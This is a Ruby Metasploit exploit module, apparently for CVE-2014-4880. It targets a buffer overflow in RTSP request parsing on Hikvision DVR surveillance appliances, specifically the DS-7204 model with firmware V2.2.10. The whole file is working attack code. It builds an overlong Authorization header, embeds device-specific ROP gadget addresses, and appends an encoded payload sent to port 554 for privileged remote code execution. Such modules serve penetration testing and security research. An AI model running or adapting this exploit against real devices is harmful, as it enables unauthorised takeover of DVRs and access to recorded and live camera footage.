require 'msf/core'
class Metasploit4 < Msf::Exploit::Remote
Rank = NormalRanking
include Exploit::Remote::Tcp
def initialize(info = {})
super (update_info(info,
'Name' => 'Hikvision DVR RTSP Request Remote Code Execution' ,
'Description' => %q{
This module exploits a buffer overflow in the RTSP request parsing
code of Hikvision DVR appliances. The Hikvision DVR devices record
video feeds of surveillance cameras and offer remote administration
and playback of recorded footage.
The vulnerability is present in several models / firmware versions
but due to the available test device this module only supports
the DS - 7204 model.
},
'Author' =>
[
'Mark Schloesser <mark_schloesser[at]rapid7.com>' ,
],
'License' => MSF_LICENSE ,
'References' =>
[
[ 'CVE' , '2014-4880' ],
],
'Platform' => 'linux' ,
'Arch' => ARCH_ARMLE ,
'Privileged' => true ,
'Targets' =>
[
[ "DS-7204 Firmware V2.2.10 build 131009" , {
:callback => :target_ds7204_1 ,
'g_adjustesp' => 0x002c828c,
'g_r3fromsp' => 0x00446f80,
'g_blxr3_pop' => 0x00456360,
'g_popr3' => 0x0000fe98,
} ],
[ "Debug Target" , {
:callback => :target_debug
} ]
],
'DefaultTarget' => 0 ,
'DisclosureDate' => 'Nov 19 2014' ))
register_options(
[
Opt:: RPORT ( 554 )
], self . class )
end
def exploit
unless self .respond_to?(target[ :callback ])
fail_with(Failure::NoTarget, "Invalid target specified: no callback function defined" )
end
device_rop = self .send(target[ :callback ])
request = "PLAY rtsp://#{rhost}/ RTSP/1.0\r\n"
request << "CSeq: 7\r\n"
request << "Authorization: Basic "
request << rand_text_alpha(0x280 + 34 )
request << [target[ "g_adjustesp" ]].pack( "V" )[ 0 .. 2 ]
request << "\r\n\r\n"
request << rand_text_alpha( 19 )
request << device_rop
request << rand_text_alpha( 8 )
request << payload.encoded
connect
sock.put(request)
disconnect
end
def target_ds7204_1
ropbuf = rand_text_alpha( 24 )
ropbuf[ 8 , 4 ] = [target[ "g_blxr3_pop" ]].pack( "V" )
ropbuf[ 12 , 4 ] = [target[ "g_popr3" ]].pack( "V" )
ropbuf[ 20 , 4 ] = [target[ "g_r3fromsp" ]].pack( "V" )
return ropbuf
end
def target_debug
Rex::Text.pattern_create( 2000 )
end
def rhost
datastore[ 'RHOST' ]
end
def rport
datastore[ 'RPORT' ]
end
end
|